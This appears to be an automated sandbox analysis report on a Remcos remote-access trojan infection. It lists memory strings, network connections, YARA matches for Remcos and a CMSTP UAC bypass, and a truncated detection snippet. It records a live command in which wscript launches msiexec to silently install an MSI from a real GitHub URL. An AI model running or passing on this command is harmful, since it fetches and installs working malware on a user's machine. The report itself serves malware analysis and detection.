                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sv.symcd.com0&
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.dr | String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.dr | String found in binary or memory: http://t2.symcb.com0
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.dr | String found in binary or memory: http://tl.symcb.com/tl.crl0
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.dr | String found in binary or memory: http://tl.symcb.com/tl.crt0
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.dr | String found in binary or memory: http://tl.symcd.com0&
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.0000000002363000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.0000000005223000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.000000000233D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.0000000002536000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.00000000022E9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.00000000023AF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BB2000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.0000000002488000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.info-zip.org/
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.symauth.com/cps0(
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.symauth.com/rpa00
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.vmware.com/0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.vmware.com/0/
                      Source: Updwork.exe, Updwork.exe, 00000007.00000000.2277568038.0000000000438000.00000002.00000001.01000000.00000006.sdmp, RaftelibeGasrss.exe, 00000016.00000000.2588325124.0000000000438000.00000002.00000001.01000000.0000000D.sdmp, Updwork.exe.3.dr | String found in binary or memory: http://www.zlib.net/
                      Source: Updwork.exe, 00000007.00000002.2473047900.000000000040A000.00000004.00000001.01000000.00000006.sdmp, RaftelibeGasrss.exe, 00000016.00000002.2766160302.000000000040A000.00000004.00000001.01000000.0000000D.sdmp, zlib1.dll.7.dr | String found in binary or memory: http://www.zlib.net/D
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://d.symcb.com/cps0%
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://d.symcb.com/rpa0
                      Source: wscript.exe, 00000000.00000002.2180487920.000001BE6E1E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180154871.000001BE6E1E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Kroby5444/
                      Source: wscript.exe, 00000000.00000002.2180621569.000001BE6E5A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.ms
                      Source: wscript.exe, 00000000.00000003.2180076930.000001BE6E201000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180205297.000001BE6E1DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi
                      Source: ~DF3A55DD39FD7B01DD.TMP.3.dr, inprogressinstallinfo.ipi.3.dr, ~DF3C7138185BD29209.TMP.3.dr, ~DFF5932D2E29931496.TMP.3.dr, ~DFEAD6EDEC35001CF3.TMP.3.dr, ~DFD62908AF9B4414CC.TMP.3.dr | String found in binary or memory: https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi0
                      Source: ~DF5F00B5FE69ED3BD9.TMP.3.dr | String found in binary or memory: https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi1630105376311466440
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.dr | String found in binary or memory: https://www.advancedinstaller.com
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.dr | String found in binary or memory: https://www.thawte.com/cps0/
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.dr | String found in binary or memory: https://www.thawte.com/repository0W
                      Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknown | HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.6:49707 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49709 version: TLS 1.2
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exe | Code function: 7_2_00405205 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_00405205
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 6_2_20433600 GetFocus,#2366,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetFocus,#2366,GetParent,#2366,#2648,SendMessageW,InvalidateRect,InvalidateRect,InvalidateRect,InvalidateRect,InvalidateRect,InvalidateRect,InvalidateRect,#5210,6_2_20433600

                      E-Banking Fraud

                      Source: Yara match | File source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001E.00000002.3107816901.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: cmd.exe PID: 5672, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: EHttpSrv.exe PID: 6336, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: cmd.exe PID: 3260, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: EHttpSrv.exe PID: 6104, type: MEMORYSTR
                      Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPED
                      Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPED

                      System Summary

                      Source: 8.2.cmd.exe.33007f8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 8.2.cmd.exe.3302800.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 29.2.EHttpSrv.exe.242d2e4.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 30.2.cmd.exe.4c22f90.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 29.2.EHttpSrv.exe.240ba18.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 25.2.cmd.exe.4b6f6c4.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 15.2.EHttpSrv.exe.23bbee4.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 15.2.EHttpSrv.exe.23bb2e4.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 23.2.EHttpSrv.exe.25a7b90.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 16.2.cmd.exe.5015f90.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 8.2.cmd.exe.5294b90.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 15.2.EHttpSrv.exe.2399a18.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 25.2.cmd.exe.4b91b90.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.EHttpSrv.exe.2367ee4.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 6.2.EHttpSrv.exe.23e12e4.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.EHttpSrv.exe.2345a18.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 6.2.EHttpSrv.exe.23bfa18.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 23.2.EHttpSrv.exe.25856c4.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 23.2.EHttpSrv.exe.25a6f90.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 16.2.cmd.exe.5016b90.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 25.2.cmd.exe.2c007f8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 6.2.EHttpSrv.exe.23e1ee4.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 32.2.EHttpSrv.exe.24f9b90.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 30.2.cmd.exe.4c016c4.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.EHttpSrv.exe.23672e4.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 32.2.EHttpSrv.exe.24f8f90.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 29.2.EHttpSrv.exe.242dee4.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 8.2.cmd.exe.33007f8.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 25.2.cmd.exe.4b90f90.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 32.2.EHttpSrv.exe.24d76c4.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 8.2.cmd.exe.5293f90.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 8.2.cmd.exe.52726c4.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 30.2.cmd.exe.4c23b90.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 25.2.cmd.exe.2bd4848.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 16.2.cmd.exe.4ff46c4.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000020.00000002.3108485798.000000000047B000.00000004.00000001.01000000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000017.00000002.2755264970.000000000047B000.00000004.00000001.01000000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000001E.00000002.3107816901.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: cmd.exe PID: 5672, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: EHttpSrv.exe PID: 6336, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: cmd.exe PID: 3260, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: EHttpSrv.exe PID: 6104, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPED | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPED | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPED | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPED | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPED | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPED | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi /qn
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi /qnJump to behavior
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
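Added example (not part of the Joe Sandbox report): a detection check for the chain recorded above, where wscript.exe launches msiexec.exe with a remote package URL and the unattended /qn switch, run over constructed Sysmon-style process-creation records. Only the first record reproduces the command line from this report; the benign control records, the Sysmon field names, the list of script-host parents and the severity tiers are this example's assumptions.

```python
import re

# Constructed process-creation records shaped like Sysmon Event ID 1 fields.
# Record 0 reproduces the wscript.exe -> msiexec.exe chain from this report;
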